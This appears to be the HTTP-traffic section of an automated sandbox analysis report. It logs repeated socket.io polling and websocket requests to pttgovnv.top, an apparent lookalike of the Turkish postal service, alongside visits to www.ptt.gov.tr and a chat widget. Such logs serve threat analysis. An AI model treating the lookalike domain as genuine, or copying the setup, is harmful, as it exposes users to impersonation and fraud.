Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liSE9 HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liSE9 HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=6Pzg8-8CUphQpNENBQUa HTTP/1.1Host: pttgovnv.topConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://pttgovnv.topSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: lN4dzCzbC6BppFWxnmzp3w==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /storage/media?gcs_file_name=chat/chat_icons/3af51a49-058b-4e67-9af9-1575813efeeb.png&chat_icon=true HTTP/1.1Host: pttem.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liSSy&sid=6Pzg8-8CUphQpNENBQUa HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /Sayfalar/Kargo/PttYurtIciKargoHizmetleri.aspx HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga=GA1.1.1249172285.1725229538; _ga_SFQ172Y7CH=GS1.1.1725229537.1.1.1725229546.0.0.0
Source: global trafficHTTP traffic detected: GET /chat/alochat.js?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ptt.gov.tr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liSSv&sid=6Pzg8-8CUphQpNENBQUa HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liSSy&sid=6Pzg8-8CUphQpNENBQUa HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liSfj&sid=6Pzg8-8CUphQpNENBQUa HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/alochat.js?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.tr HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.ptt.gov.tr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pttem.alo-tech.com_ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t_cookieEnable=true
Source: global trafficHTTP traffic detected: GET /chat/alochat.css?wid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/get_my_widget_settings?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&escapeHtml=false HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://chatserver.alo-tech.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liTio HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /storage/media?gcs_file_name=chat/chat_icons/3af51a49-058b-4e67-9af9-1575813efeeb.png&chat_icon=true HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liU2v&sid=n5SI5ZA_n-p0FL9TBQUd HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=n5SI5ZA_n-p0FL9TBQUd HTTP/1.1Host: pttgovnv.topConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://pttgovnv.topSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: IOFwPnEwA9iQ9SFgY25Igg==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /Sayfalar/Kargo/PttYurtDisiKargoHizmetleriUst.aspx HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga=GA1.1.1249172285.1725229538; _ga_SFQ172Y7CH=GS1.1.1725229537.1.1.1725229552.0.0.0
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liTio HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /storage/media?gcs_file_name=chat/chat_icons/3af51a49-058b-4e67-9af9-1575813efeeb.png&chat_icon=true HTTP/1.1Host: pttem.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/get_my_widget_settings?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&escapeHtml=false HTTP/1.1Host: pttem.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liU2h&sid=n5SI5ZA_n-p0FL9TBQUd HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liUF7&sid=n5SI5ZA_n-p0FL9TBQUd HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liU2v&sid=n5SI5ZA_n-p0FL9TBQUd HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/alochat.js?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ptt.gov.tr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/alochat.js?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.tr HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.ptt.gov.tr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pttem.alo-tech.com_ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t_cookieEnable=true
Source: global trafficHTTP traffic detected: GET /chat/alochat.css?wid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liV9d HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/get_my_widget_settings?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&escapeHtml=false HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://chatserver.alo-tech.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liV9d HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liVLA&sid=M3Npq313xU4h1v3KBQUg HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=M3Npq313xU4h1v3KBQUg HTTP/1.1Host: pttgovnv.topConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://pttgovnv.topSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: 2Yga0+U+fTebfRxQ7379dg==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /storage/media?gcs_file_name=chat/chat_icons/3af51a49-058b-4e67-9af9-1575813efeeb.png&chat_icon=true HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /Sayfalar/Posta/UETS.aspx HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga=GA1.1.1249172285.1725229538; _ga_SFQ172Y7CH=GS1.1.1725229537.1.1.1725229559.0.0.0
Source: global trafficHTTP traffic detected: GET /chat/get_my_widget_settings?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&escapeHtml=false HTTP/1.1Host: pttem.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liVL8&sid=M3Npq313xU4h1v3KBQUg HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liVXF&sid=M3Npq313xU4h1v3KBQUg HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liVLA&sid=M3Npq313xU4h1v3KBQUg HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/alochat.js?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ptt.gov.tr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
